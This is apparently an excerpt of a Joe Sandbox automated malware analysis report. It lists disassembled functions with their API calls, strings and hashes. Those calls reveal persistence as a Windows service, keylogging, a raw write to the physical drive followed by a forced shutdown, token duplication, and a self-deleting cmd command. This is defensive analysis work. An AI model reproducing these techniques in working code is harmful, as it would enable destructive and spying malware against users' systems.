                                • Opcode ID: 0f8b1afdae263fc5f31eb1a4d2879b3d3073950ff6c0fef945add2025c005f4d
                                • Instruction ID: 79cc15ec923557039719f989f8a4f9b88d7cbaf7b55712b4d523ddd9f39cbdd7
                                • Opcode Fuzzy Hash: 0f8b1afdae263fc5f31eb1a4d2879b3d3073950ff6c0fef945add2025c005f4d
                                • Instruction Fuzzy Hash: DEE08C267000283B99206A4ABC05EBB779DCBC2AB6B44002BF94DDA200D6A5EC1262F1
                                APIs
                                • SetEvent.KERNEL32(?), ref: 100078B5
                                  • Part of subcall function 100070D0: LoadLibraryA.KERNEL32(user32.dll,?,?,?), ref: 100070F8
                                  • Part of subcall function 100070D0: GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 1000710F
                                  • Part of subcall function 100070D0: GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 1000711A
                                  • Part of subcall function 100070D0: GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 10007124
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$EventLibraryLoad
                                • String ID:
                                • API String ID: 2618588663-0
                                • Opcode ID: cac31f68988169503a993edc32f5f36763c606e0e90ba62ce0c1cc300262aecb
                                • Instruction ID: e6611d9761a6c322e6e4e74e23572cde025ecbacdf7de9bd2e17bdde1b1c4579
                                • Opcode Fuzzy Hash: cac31f68988169503a993edc32f5f36763c606e0e90ba62ce0c1cc300262aecb
                                • Instruction Fuzzy Hash: 27E04F7B6402149BD200DBD9D884E46B3ECFB49661B098062F6089B215C631F80087B1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: a96b5ca36e0d9458bbb76e39f89c85aac48d9ac318ccee0bceebbcd7f9e84ca6
                                • Instruction ID: a0e5fee4f78ae5c3ef2375e40d1933ea0cc4ef318826087641a31f54aff28098
                                • Opcode Fuzzy Hash: a96b5ca36e0d9458bbb76e39f89c85aac48d9ac318ccee0bceebbcd7f9e84ca6
                                • Instruction Fuzzy Hash: 0AC02B3220430C178E301ED4BC0856173CC0601B543000011F80CC7200D260E5500180
                                APIs
                                • CreatePen.GDI32(00000000,?,00000001), ref: 00717B45
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 20250f848470622d5ed23820d6980e18a1fc635727f3d034ea77ce0418000484
                                • Instruction ID: 390c8fb9e0a88d423e3ac51d8b3174efd7bd14dabd7dad1be4b78a547dbc6c69
                                • Opcode Fuzzy Hash: 20250f848470622d5ed23820d6980e18a1fc635727f3d034ea77ce0418000484
                                • Instruction Fuzzy Hash: 52D0127250810CFB8714DF88DC45C9F77ADEB88310B10814CB90883200CA309D10DBA4
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 0071D27F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteObject
                                • String ID:
                                • API String ID: 1531683806-0
                                • Opcode ID: 9185d05865b69abcc7f1dee76d26004fea36779196bc817d6a56d3d29f1d7f58
                                • Instruction ID: 019b1959d68b415023385adb2dbaf1d5562ecf122e6f08dc6609de01268f59bf
                                • Opcode Fuzzy Hash: 9185d05865b69abcc7f1dee76d26004fea36779196bc817d6a56d3d29f1d7f58
                                • Instruction Fuzzy Hash: C5D05E70918208EBCB30DBA8ED09A9AB7A9FB44311F108598F41993291CB39EE50DA54
                                APIs
                                • CreateSolidBrush.GDI32(00000000), ref: 00717BED
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: BrushCreateSolid
                                • String ID:
                                • API String ID: 4168422804-0
                                • Opcode ID: 83c6f6cf3bfe9a678d1e70555a9bd43621e1b7dc09a03fe04f68bcdf70e34919
                                • Instruction ID: 0c43c302e1dc06502bd856365507dc7fca22078e5818728e45304ad40332cb21
                                • Opcode Fuzzy Hash: 83c6f6cf3bfe9a678d1e70555a9bd43621e1b7dc09a03fe04f68bcdf70e34919
                                • Instruction Fuzzy Hash: 0BD012B290810CFB8B14DFD9ED0AC9FBBADDB88320B104159B908C3201CE359E10EBE5
                                APIs
                                • ___security_init_cookie.LIBCMTD ref: 008E0105
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___security_init_cookie
                                • String ID:
                                • API String ID: 3657697845-0
                                • Opcode ID: 3a135d4ecbbb25a97445ba00556f3aa4c9cd32c5febd93fea10c448e7af2d5db
                                • Instruction ID: bf374bcc9a598ebb1744641e7e031131fa316ffc71fff585db2945c190bf077f
                                • Opcode Fuzzy Hash: 3a135d4ecbbb25a97445ba00556f3aa4c9cd32c5febd93fea10c448e7af2d5db
                                • Instruction Fuzzy Hash: F8A0022120468C16016133FF040791A764DE9C1710FA60614B69886143BC98A85154A7
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 10003B84
                                • ExpandEnvironmentStringsA.KERNEL32(%ProgramFiles%\,?,00000104), ref: 10003B9B
                                • _strncmp.LIBCMT ref: 10003BC8
                                • wsprintfA.USER32 ref: 10003BFE
                                • CopyFileA.KERNEL32(?,?,00000000), ref: 10003C88
                                • _memset.LIBCMT ref: 10003C9C
                                • SetFileAttributesA.KERNEL32(?), ref: 10003CD2
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10003CED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCopyEnvironmentExpandManagerModuleNameOpenStrings_memset_strncmpwsprintf
                                • String ID: %ProgramFiles%\$%s$Crprosc.exe$Description$Rsymwe miusskwq$SYSTEM\CurrentControlSet\Services\
                                • API String ID: 1759134882-3124969361
                                • Opcode ID: 87261741af64d30afc0f6ff72391bcbc02a2d1e4837f4082d5125abca565abeb
                                • Instruction ID: 48bcbe308d92f5308221444845ed34af3ce96e03a315b5f552593da84cf64539
                                • Opcode Fuzzy Hash: 87261741af64d30afc0f6ff72391bcbc02a2d1e4837f4082d5125abca565abeb
                                • Instruction Fuzzy Hash: 1DA18D71900659EFEB12CFA4CC88BEEBBF9FB49341F148159F645AB240DB719A44CB90
                                APIs
                                • SetupDiGetClassDevsA.SETUPAPI(00000000,PCI,00000000,00000006), ref: 100021B1
                                • SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,?), ref: 100021DC
                                • _memset.LIBCMT ref: 10002208
                                • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,0000001C,00000008,?,00000000,00000064,?), ref: 1000222F
                                • GetLastError.KERNEL32 ref: 10002235
                                • GetLastError.KERNEL32 ref: 10002237
                                • GetLastError.KERNEL32 ref: 1000223E
                                • LocalFree.KERNEL32(00000000), ref: 10002250
                                • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,0000001C,00000008,?,00000000,00000064,00000064), ref: 10002270
                                • GetLastError.KERNEL32 ref: 10002276
                                • SetupDiSetClassInstallParamsA.SETUPAPI(00000000,0000001C,?,00000014), ref: 100022C1
                                • GetLastError.KERNEL32 ref: 100022CB
                                • SetupDiCallClassInstaller.SETUPAPI(00000012,00000000,0000001C), ref: 100022D4
                                • GetLastError.KERNEL32 ref: 100022DE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastSetup$ClassDevice$PropertyRegistry$CallDevsEnumFreeInfoInstallInstallerLocalParams_memset
                                • String ID: PCI$d${4D36E972-E325-11CE-BFC1-08002BE10318}
                                • API String ID: 4248345096-713369733
                                • Opcode ID: aece4127dc8f8a0d0342a986327ebc64b3b5427c9bf85fe73c0d1398f77afc9f
                                • Instruction ID: e53bca369c00d10cefde70ac56b68b62e1b53dfa3e30aa9ac783fa0f7639fe53
                                • Opcode Fuzzy Hash: aece4127dc8f8a0d0342a986327ebc64b3b5427c9bf85fe73c0d1398f77afc9f
                                • Instruction Fuzzy Hash: 73418F72900219BEFB00DBE4CC84FEE77B8EB49785F048119F905EA080EB71DA44CBA1
                                APIs
                                • _memset.LIBCMT ref: 10002068
                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 100020B6
                                • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 100020E1
                                • WriteFile.KERNEL32(00000000,00000000,00000200,?,00000000), ref: 100020F6
                                • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 10002110
                                • CloseHandle.KERNEL32(00000000), ref: 10002113
                                • Sleep.KERNEL32(000007D0), ref: 1000211E
                                • GetVersion.KERNEL32 ref: 10002124
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 10002137
                                • OpenProcessToken.ADVAPI32(00000000), ref: 1000213E
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 1000214F
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 10002173
                                • ExitWindowsEx.USER32(00000006,00000000), ref: 1000217D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ControlDeviceFileProcessToken$AdjustCloseCreateCurrentExitHandleLookupOpenPrivilegePrivilegesSleepValueVersionWindowsWrite_memset
                                • String ID: DRIV$E0$ICAL$PHYS$SeShutdownPrivilege$\\.\
                                • API String ID: 3134506363-4047777455
                                • Opcode ID: 79f18fb8986aeeb18111b2df7efe05c95f7744f08719ca522ec74f3b33cbb018
                                • Instruction ID: 536ec1df11fdbdf0b37df508a8d92a083700a50f4702d5988ad7a850c2b9a61b
                                • Opcode Fuzzy Hash: 79f18fb8986aeeb18111b2df7efe05c95f7744f08719ca522ec74f3b33cbb018
                                • Instruction Fuzzy Hash: B8312971A90318BAF721DBD0CC8AFEE7A78AB48B01F148144F315BE0D0D7B566058BA9
                                APIs
                                • LoadLibraryA.KERNEL32(userenv.dll), ref: 100040A4
                                • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 100040AE
                                • _memset.LIBCMT ref: 100040CC
                                • GetCurrentProcess.KERNEL32 ref: 100040FC
                                • OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 1000410C
                                • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 10004124
                                • LoadLibraryA.KERNEL32(Kernel32.dll,WTSGetActiveConsoleSessionId), ref: 10004134
                                • GetProcAddress.KERNEL32(00000000), ref: 10004137
                                • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 10004152
                                • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000430,?,00000000,00000044,?), ref: 10004182
                                • CloseHandle.KERNEL32(?), ref: 1000418F
                                • CloseHandle.KERNEL32(?), ref: 10004199
                                • FreeLibrary.KERNEL32(00000000), ref: 100041A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryProcessToken$AddressCloseHandleLoadProc$CreateCurrentDuplicateFreeInformationOpenUser_memset
                                • String ID: CreateEnvironmentBlock$D$Kernel32.dll$WTSGetActiveConsoleSessionId$userenv.dll
                                • API String ID: 806618471-609967149
                                • Opcode ID: 1efd4a36ce481bd46393d7c184948f0d14218a48c002afb0f4fecd632797a9c6
                                • Instruction ID: b5812ef77b0705d2b2e5db47a8e8c26cb189cd6968729d8bae3e883c757048cf
                                • Opcode Fuzzy Hash: 1efd4a36ce481bd46393d7c184948f0d14218a48c002afb0f4fecd632797a9c6
                                • Instruction Fuzzy Hash: 7641D8B5D00229EBEB10DBE5CC89DDEBBB8EB48751F144149F609AB250D7759A40CBA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: d$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp
                                • API String ID: 0-1726820327
                                • Opcode ID: 23507197f458a90e38209c02f1350ef126de4255d90e8f71eef599b993a80ee0
                                • Instruction ID: bd57108b57897e1804c592bae9a54d8bf2fce5cac4a9554cd4aa6b84ee6621c7
                                • Opcode Fuzzy Hash: 23507197f458a90e38209c02f1350ef126de4255d90e8f71eef599b993a80ee0
                                • Instruction Fuzzy Hash: 0A22AF7190415ACBDB28DFA9CC95BFD7BB2EF88300F108139E115AB6C5DB389985DB60
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: State_memset$AsyncSleeplstrlen
                                • String ID: <BackSpace>$<Enter>
                                • API String ID: 879715006-3792472884
                                • Opcode ID: 1faae7d25346515abcf9613c5be438da7cc98f1ceda24c97c42ce44e17f5be21
                                • Instruction ID: 183c04186e54e565c7325ce29d9980bd315c41101cf81fa8ff01267ffe614cb6
                                • Opcode Fuzzy Hash: 1faae7d25346515abcf9613c5be438da7cc98f1ceda24c97c42ce44e17f5be21
                                • Instruction Fuzzy Hash: EA513BF19006A4AAFB60DF90CC89FCD7369EB807C2F520595F905A7088DF71EA818B5D
                                APIs
                                • SetFileAttributesA.KERNEL32(?), ref: 10003CD2
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10003CED
                                • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 10003D23
                                • LockServiceDatabase.ADVAPI32(00000000), ref: 10003D2F
                                • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,Rsymwe miusskwq), ref: 10003D45
                                • ChangeServiceConfig2A.ADVAPI32(00000000,00000002,00015180), ref: 10003D98
                                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 10003D9F
                                • GetLastError.KERNEL32 ref: 10003DA9
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10003DC0
                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10003DD8
                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10003DE3
                                • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 10003E3F
                                • lstrlenA.KERNEL32(100046E6), ref: 10003E49
                                • RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,100046E6,00000000), ref: 10003E5E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$Open$ChangeConfig2DatabaseStart$AttributesCreateErrorFileLastLockManagerUnlockValuelstrlen
                                • String ID: Description$Rsymwe miusskwq$SYSTEM\CurrentControlSet\Services\
                                • API String ID: 3679062986-2286593402
                                • Opcode ID: a346239f102f653480e3e17e6b604b5aac246f91ac2f7b1ef3c4c97553927911
                                • Instruction ID: 38a0c26b05307ae233fc1ce47fd9cfd69ad5504bd6d830eda161c56751f8ecc6
                                • Opcode Fuzzy Hash: a346239f102f653480e3e17e6b604b5aac246f91ac2f7b1ef3c4c97553927911
                                • Instruction Fuzzy Hash: 63513B71A00258AFEB16CFA4CC84BEEBBF9FB48341F148129F609AB280D77599448B50
                                APIs
                                • FindResourceA.KERNEL32(000000FF,00000000,00000005), ref: 0070E61E
                                • LoadResource.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00913B00,000000FF), ref: 0070E62F
                                • LockResource.KERNEL32(00000000,ED5B0DC1), ref: 0070E642
                                • GetDesktopWindow.USER32 ref: 0070E684
                                • IsWindowEnabled.USER32(00000000), ref: 0070E693
                                • EnableWindow.USER32(00000000,00000000), ref: 0070E6A3
                                • EnableWindow.USER32(00000000,00000001), ref: 0070E823
                                • GetActiveWindow.USER32 ref: 0070E82F
                                • SetActiveWindow.USER32(00000000), ref: 0070E841
                                • FreeResource.KERNEL32(00000000,00000000), ref: 0070E884
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp, xrefs: 0070E5D4, 0070E77C
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Resource$ActiveEnableMessage$DesktopEnabledFindFreeLoadLockPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp
                                • API String ID: 4220276247-2300472847
                                • Opcode ID: 37f9fb4df9d59e0f2dcdad0f62e53d09e56bc36c27302b37e67683c456757a34
                                • Instruction ID: d545a5e17cbf1bb6e4a41f6570640e49cb6d30efef95e66ed231f93e3c78aae1
                                • Opcode Fuzzy Hash: 37f9fb4df9d59e0f2dcdad0f62e53d09e56bc36c27302b37e67683c456757a34
                                • Instruction Fuzzy Hash: 3EA1D971E00208DFDB18DFA4D889BAEB7F5BF48314F208619E515A72E1DB79AD41CB90
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 100062BF
                                • OpenServiceA.ADVAPI32(00000000,Rsymwe miusskwq,000F01FF), ref: 100062D0
                                • DeleteService.ADVAPI32(00000000), ref: 100062D7
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100062E9
                                • lstrcatA.KERNEL32(?,?), ref: 10006313
                                • DeleteFileA.KERNEL32(?), ref: 10006320
                                  • Part of subcall function 10006140: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000615A
                                  • Part of subcall function 10006140: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 10006177
                                  • Part of subcall function 10006140: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 10006196
                                  • Part of subcall function 10006140: lstrcpyA.KERNEL32(?, /c del ), ref: 100061B0
                                  • Part of subcall function 10006140: lstrcatA.KERNEL32(?,?), ref: 100061CA
                                  • Part of subcall function 10006140: lstrcatA.KERNEL32(?, > nul), ref: 100061D8
                                  • Part of subcall function 10006140: lstrcatA.KERNEL32(?,?), ref: 100061E8
                                  • Part of subcall function 10006140: _memset.LIBCMT ref: 100061F2
                                  • Part of subcall function 10006140: GetCurrentProcess.KERNEL32(00000100), ref: 1000622B
                                  • Part of subcall function 10006140: SetPriorityClass.KERNEL32(00000000), ref: 10006234
                                  • Part of subcall function 10006140: GetCurrentThread.KERNEL32 ref: 10006238
                                  • Part of subcall function 10006140: SetThreadPriority.KERNEL32(00000000), ref: 10006245
                                  • Part of subcall function 10006140: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000044,00000000), ref: 10006264
                                  • Part of subcall function 10006140: SetPriorityClass.KERNEL32(00000000,00000040), ref: 10006274
                                  • Part of subcall function 10006140: SetThreadPriority.KERNEL32(?,000000F1), ref: 1000627C
                                  • Part of subcall function 10006140: ResumeThread.KERNEL32(?), ref: 10006282
                                  • Part of subcall function 1000860D: _doexit.LIBCMT ref: 10008619
                                  • Part of subcall function 10001430: WSAStartup.WS2_32(00000202,?), ref: 10001495
